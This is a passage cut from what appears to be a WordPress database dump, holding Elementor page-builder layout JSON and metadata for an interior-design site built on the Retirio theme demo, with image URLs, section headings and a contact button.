"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\" Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living\",\"title\":\"Wujudkan mimpi anda sekarang!\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8611b14\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(4556,4975,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4557,4975,'_elementor_pro_version','3.8.1'),(4558,4975,'_elementor_css','a:6:{s:4:\"time\";i:1695638544;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4559,4976,'_wp_page_template','elementor_header_footer'),(4560,4976,'_elementor_edit_mode','builder'),(4561,4976,'_elementor_template_type','wp-page'),(4562,4976,'_elementor_version','3.8.1'),(4563,4976,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"